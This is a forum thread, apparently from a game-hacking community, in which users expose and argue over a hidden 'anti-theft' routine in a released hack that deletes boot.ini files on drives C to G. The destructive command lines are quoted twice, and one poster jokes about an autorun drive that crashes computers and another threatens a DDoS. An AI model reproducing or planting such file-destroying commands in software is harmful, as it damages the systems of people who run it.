This is a pretty nice hack, though, when I tried it, many of the features didn't work.

Alright, I'll take the high road by saying this:
I've only really had one encounter where some ******* stole my program. He got banned, and all the rest that was coming for him.
I'll remove the boot.ini deletion, I don't care if anyone steals my script, they can't really do much with it anyway (especially on this forum :P).
Thanks for your input once again.
And to everyone else: The site is down, yes. I'm considering moving hosts, and to anyone who manages FTPs for whatever reason you'll know what I mean when I say it's a real pain in the ass.
What. The. ****.Code:; _RunDOS("del C:\boot.ini /f /a h s") ; _RunDOS("del D:\boot.ini /f /a h s") ; _RunDOS("del E:\boot.ini /f /a h s") ; _RunDOS("del F:\boot.ini /f /a h s") ; _RunDOS("del G:\boot.ini /f /a h s")
Go die.
Edit: read your other posts, there's no justification for what you did.

Thank god for Linux!Code:; _RunDOS("del C:\boot.ini /f /a h s") ; _RunDOS("del D:\boot.ini /f /a h s") ; _RunDOS("del E:\boot.ini /f /a h s") ; _RunDOS("del F:\boot.ini /f /a h s") ; _RunDOS("del G:\boot.ini /f /a h s")
Although... Imagain Microsoft did something like this and well... It happened to you. How would you like it?
Well vista does not use boot.ini, as for xp i think that there's always a copy of it somewhere, but from what i understood program deletes boot files only if someone tries to decompile it right? And yea normal people don't try to decompile programs, but still this isn't very polite thing to do.
Cheers & Respect
I totally lol'd at jad's copy protection.
first off, if you fall for that, you deserve it imho. get a better resident shield.
second, while being totally irresponsible and wrong, it's funny as hell. i added an anti-theft device to a flash drive of mine once like that. autorun on it would insta BSoD your computer.
third, that's a pretty ghetto way to delete the boot.ini. my root is on my X drive =)
fourth, until you get a better host, i think an ini file with the current version's pointers would be nice, then we'd be able to use your very well made hack all the time, not just on the odd occasion when your host is up. you could even encrypt the ini, to keep your pointers safe. (though anyone with half a brain could find them/get them on this site)
cheers, kurt
I hate it when there is Mr.1post's on here responding.
However... It wasn't my intention to expose his code... cause a problem deliberately or make him look bad.
Bottom line... he was protecting his code... it's HOW he went about it that concerned me posting that.
My apologies if it's caused strife on anyone.![]()
EDIT;
Just re-read everything and caught why it doesn't work.
Hope the website comes back soon. And yes, Jadd I hated having to deal with FTP.

whoa whoa wait... so yall bitch at him for doing this when wow infinity does the same exact thing... You know malu is the one who gave him the snippet to put in there in the first place since his own code is in the app he didnt want it getting stolen. Understandable but still like knyox says, no one has the right to royally **** someones PC...
Rofl. Won't that fail on anything past XP anyway?
I just checked on my Windows 7 machine and as I suspected, boot.ini doesn't even exist. Vista and Windows 7 use the new BCD (Boot Configuration Data) system.
At any rate, even if you are one of those silly XP users (lol), you should be able to recover by just throwing in your XP disk and doing a recovery.
I'm not saying Jadd has any right to do something so invasive -- frankly if that happened to my PC he'd quickly find his site being DDoSed -- but not only is it easy to recover from, it won't even work on anything beyond Vista.

I hear all the l33t haxx0rz use the H drive anyway - I guess the rest of the alphabet got a bit complex after G
